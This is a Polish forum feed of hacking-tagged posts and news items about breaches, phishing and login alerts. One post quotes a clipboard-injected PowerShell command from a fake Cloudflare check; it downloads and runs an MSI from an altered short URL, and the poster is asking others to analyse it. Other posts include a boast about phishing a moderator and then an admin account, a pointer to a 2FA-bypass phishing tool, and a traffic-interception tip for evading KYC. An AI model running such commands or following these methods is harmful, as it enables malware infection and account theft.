Wszystko
Najnowsze
Archiwum
Atak hakerski na Polską Agencję Kosmiczną. Zabezpieczyliśmy systemy
Polska Agencja Kosmiczna padła ofiarą ataku hakerskiego. W związku z incydentem zabezpieczone zostały systemy objęte atakiem poinformował Krzysztof Gawkowski, minister cyfryzacji. Służby ustalają sprawcę ataku
z- 2
- #
- #
- #
- #
- #
mirki i mireczki taka sprawa:
Z ciekawosci sobie w authenticatorze sprawdziłem atywność na koncie Microsoft i zauważyłem, że od kilku miesięcy kilka razy dziennie mam podejrzaną aktywność. Próby logowań z różnych miejsc - błędne hasło. Konto zabezpieczone aplikacją + mocne hasło. O co chodzi?
#microsoft #informatyka #hacking #komputery
Z ciekawosci sobie w authenticatorze sprawdziłem atywność na koncie Microsoft i zauważyłem, że od kilku miesięcy kilka razy dziennie mam podejrzaną aktywność. Próby logowań z różnych miejsc - błędne hasło. Konto zabezpieczone aplikacją + mocne hasło. O co chodzi?
#microsoft #informatyka #hacking #komputery
@grzegor9: Próbują ale sie odbijają to dobrze, to mogą być syfy bazujące na wyciekach haseł z innych źródeł. A z ciekawości gdzie dokłądnie tą historie sprawdziłeś? Też musze!
Mnie dawniej niepokoiły potwierdzenia logowań z jakiś dziwnych geolokalizacji no ale tak to klasyfikuje widocznie logowanie do różnych serwisów powiązanych
Mnie dawniej niepokoiły potwierdzenia logowań z jakiś dziwnych geolokalizacji no ale tak to klasyfikuje widocznie logowanie do różnych serwisów powiązanych
@stojam_obok: nie zabezpieczam nim tego konta
Treść przeznaczona dla osób powyżej 18 roku życia...
Treść przeznaczona dla osób powyżej 18 roku życia...
@opiateterrorist przyznam, że sam byłem zaskoczony bo było sporo gadki w kręgach wiadomych, że teraz jak masz garstkę lekarzy i każdy wypisuje Ci to samo to będą się widzieć wzajemnie w systemie. Otóż nie. Założenia chyba takie były, ale na obecną chwilę nie ma takiej możliwości. Coś też mi babka wspominała o jakiejś dodatkowej licencji która byłaby do takich danych niezbędna, ale tutaj już nie pamiętam dokładnie, to było parę miesięcy
Bybit zhakowane przez północnokoreańską grupę Lazarus – największy atak hakerski w historii kryptowalut
https://bitcoinpl.org/bybit-zhakowane-przez-polnocnokoreanska-grupe-lazarus-najwiekszy-atak-hakerski-w-historii-kryptowalut/
#kryptowaluty #bitcoin #hackingnews #hacking #hakerzy
https://bitcoinpl.org/bybit-zhakowane-przez-polnocnokoreanska-grupe-lazarus-najwiekszy-atak-hakerski-w-historii-kryptowalut/
#kryptowaluty #bitcoin #hackingnews #hacking #hakerzy
źródło: image
Pobierz@tomas-minner: ale nadchodzi krach
konto usunięte via Wykop
@tomas-minner: Lazarus? To ci od programowania w PASCALu? Pewnie srednia wieku to 60 lat.
W sumie phising jest tak prosty jak usmażenie kotleta xD Po porostu stawia się stronę którą wygląda tak samo jak orignał, po prostu kradnie się HTML i CSS ale wszystko co dana osoba przesyła przez form jest po prostu zapisywane w moijej database, takie hehe, ja dzięki takiemu atakowi dostałem dostep do konta moderatora zapytaj.com.pl, ale potem poszukałem w prywatych wiadomościach i bang, mam hasło do konto admina :3 Nawet zrobiłem zdjęcia
@aptitude: Trzeba jeszcze zwabić ofiarę na taką "lewą" stronę i to jest spory problem. Do tego dochodzi 2FA, więc potrzebujesz czegoś sprytniejszego jak https://github.com/drk1wi/Modlishka
Jak rozpoznać phishing? Praktyczne porady cyberbezpieczeństwa
Jak sprawdzić, czy podejrzany link lub załącznik w wiadomości są złośliwe? Można to zrobić w kilku prostych krokach, za darmo. Zapraszamy do artykułu otwierającego nasz cykl praktycznych porad cyberbezpieczeństwa dla każdego
z- 2
- #
- #
- #
- #
- #
- #
Czy ma tu ktoś na telefonie ogarnięte #mitmproxy na Androidzie i mógłby mi jedną rzecz sprawdzić?
#hacking #informatyka #programowanie
#hacking #informatyka #programowanie
Treść przeznaczona dla osób powyżej 18 roku życia...
Na stronie japomoto.pl wyskakuje mi pop-up niby od Cloudflare, że nie może zweryfikować, że jestem człowiekiem. Pokazuje się obrazek (poniżej) i automatycznie kopiuje mi do schowka kod
Adres w kodzie powyżej zmieniłem, żeby nikt się nie naciął. Oczywiście nic nie wklejam, ale jestem ciekaw co to polecenie zrobi.
Pomożecie rozszyfrować?
#hacking #wirus
cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\users\public\3aw.msi'; Invoke-RestMethod -Uri 'https://cośtam.short.gy/1' -OutFile $path; Start-Process $path;Adres w kodzie powyżej zmieniłem, żeby nikt się nie naciął. Oczywiście nic nie wklejam, ale jestem ciekaw co to polecenie zrobi.
Pomożecie rozszyfrować?
#hacking #wirus
źródło: Zrzut ekranu 2025-02-10 210023
Pobierz
@certpl zgłoszenie, albo strona z malware albo zasyfiona
@tomilipin: Zgłoś na https://incydent.cert.pl jako próbkę złośliwego oprogramowania albo zainfekowaną domenę.
Wyciek danych ze strony z przepisami. Na celowniku użytkownicy Thermomiksa
Fakt, że wypłynąć może informacja o dodawaniu pizzy do ananasa, jest najmniejszym problemem w tym przypadku. Wprawdzie Vorwerk zapewnia, że najważniejsza informacja nie wpadła w ręce cyberprzestępców, ale i tak pozyskali cenne dane.
z- 23
- #
- #
- #
- #
- #
Treść przeznaczona dla osób powyżej 18 roku życia...
@marcomarco83838383: skąd pobrałeś spolszczenie?
@marcomarco83838383 jakim cudem przy podwójnym uwierzytelnieniu zmienił adres email/hasło?
Polskie projekty IT Security co słychać w LKRG (Linux Runtime Kernel Guard)
Rozmawiamy z Adamem "pi3" Zabrockim oraz Solar Designerem o LKRG (Linux Runtime Kernel Guard), które może znacznie utrudnić zhackowanie Linuxa. Co słychać i jak przebiega rozwój projektu, czy ktoś próbował skutecznie obejść LKRG? Zapraszamy do lektury! :)
z- 4
- #
- #
- #
- #
- #
- #
Co się stało z danymi #eurocert
Dane miały być opublikowane dzisiaj, na cebulkowej stronie grupy która dopuściła się kradzieży nie widać już wpisu odliczającego do publikacji, publikacji nie ma (a inne dane które miały zostać opublikowane dzisiaj już są do pobrania).
Przestraszyli się skali problemu i tego, że dotyka on raczej wysoko ustawionych w hierarchii społecznej ludzi (nie zwykły Kowalski) i się wycofali, czy #eurocert opłacił haracz?
#
Dane miały być opublikowane dzisiaj, na cebulkowej stronie grupy która dopuściła się kradzieży nie widać już wpisu odliczającego do publikacji, publikacji nie ma (a inne dane które miały zostać opublikowane dzisiaj już są do pobrania).
Przestraszyli się skali problemu i tego, że dotyka on raczej wysoko ustawionych w hierarchii społecznej ludzi (nie zwykły Kowalski) i się wycofali, czy #eurocert opłacił haracz?
#
Wyrywałem sobie włosy przez kilka literek
Zamiast res.set("Content-Type", "application/xml"); musiałem zmienić na res.set("Content-Type", "text/xml");
To technologia z lat 2007
Ale teraz działa <3 Skoro wiem już jak ustawić MIME, ale to też ich wina, nikt w dokumentacji nie napisał, że musi być text/xml!
Zamiast res.set("Content-Type", "application/xml"); musiałem zmienić na res.set("Content-Type", "text/xml");
To technologia z lat 2007
Ale teraz działa <3 Skoro wiem już jak ustawić MIME, ale to też ich wina, nikt w dokumentacji nie napisał, że musi być text/xml!
źródło: 2025-01-24-15-03-37-037
Pobierz
Właśnie stawiam serwisy na Cisco 7942G, i właśnie przez skórę czuje nostalgie jak dawniej było prosto gdzież się włamać nawet tak dla zabawy.
Mój openssh nawet nie chce się połączyć przez ssh z telefonem, bo jest za stary xD
Nawet to nie działa:
Host ciscodevice
Hostname
Mój openssh nawet nie chce się połączyć przez ssh z telefonem, bo jest za stary xD
Nawet to nie działa:
Host ciscodevice
Hostname
@aptitude: w sumie szkoda, że nie ma 3 linii, bo przydałaby się do testów, bo teraz na pierwszej mam sip.sdf.org a na drugiej dus.net, a chciałbym dodać trzecią ale nie obsługuje, jak chce coś testować usuwam dus.net i zamieniam na własny serwer SIP. Bo na dus.net mogę tylko dzwonić i to dosłownie na każdy numer i to kosztuje tylko centy. Ale nie mam własnego numeru jak na sdf, na sdf
Nawet nowy firmware bez pytania oO Jak widać dawniej nie trzymali się bezpieczeństwa xD
@aptitude: Nic się nie zmieniło xd
Uruchomienie starej wersji aplikacji Kanga Wallet
Ten poradnik pozwala nadal używać wersji aplikacji Kanga Wallet, która nie pyta o KYC. Działa on na Androdzie 6 lub starszym, gdzie nie trzeba rootować telefonu, aby podsłuchać szyfrowaną komunikację HTTPS. Nowszymi wersjami zajmę się później.
1. Instalujemy PCAPdroid
2. Instalujemy PCAPdroid-mitm
3. adb shell
Ten poradnik pozwala nadal używać wersji aplikacji Kanga Wallet, która nie pyta o KYC. Działa on na Androdzie 6 lub starszym, gdzie nie trzeba rootować telefonu, aby podsłuchać szyfrowaną komunikację HTTPS. Nowszymi wersjami zajmę się później.
1. Instalujemy PCAPdroid
2. Instalujemy PCAPdroid-mitm
3. adb shell
Czy jeżeli giełda dojdzie do tego, że handlujesz bez KYC, to nie zablokuje ci środków?
@kamil-wasniewski: Dobre pytanie. Zgodnie z oficjalnym stanowiskiem Kangi można legalne handlować bez KYC spoza krajów EOG, czyli możesz połączyć się przez VPN np. z Ukrainy i aplikacja nie powinna zapytać o KYC.
Poradnik dotyczy możliwości dalszego korzystania ze starszej wersji aplikacji (jeśli ktoś nie aktualizuje).
Sprawdziłem z Proton VPN, działa. Nie pyta o KYC :)
Przyszło mi powiadomienie od facebooka odnośnie nieznanego logowania, a sesja wygasła(w tym samym czasie jak straciłam internet w telefonie) Pierwszy raz taka sytuacja. Hasło od razu zmienione, wylogowane ze wszystkiego i dwustopniowa weryfikacja, email też zmieniony. Czy to możliwe, że to fałszywy alarm i facebook się rypnął z lokalizacją? I czy zrobić coś jeszcze, czy już jest safe? I w dzienniku aktywności było kilka razy wyszukiwane moje imię i nazwisko :/ #
źródło: image
Pobierz
#hacking #hakerzy #hakerstwo #cracking #konsole
W jaki sposób działają osoby parające się crackingiem konsol? Z jakiego oprogramowania korzystają do wyszukiwania luk w konsoli? Dlaczego to robią?
〰〰〰〰〰〰〰〰〰〰〰〰〰〰〰
· Akcje: Odpowiedz anonimowo · Więcej szczegółów
https://youtu.be/XuOm-RTQxVU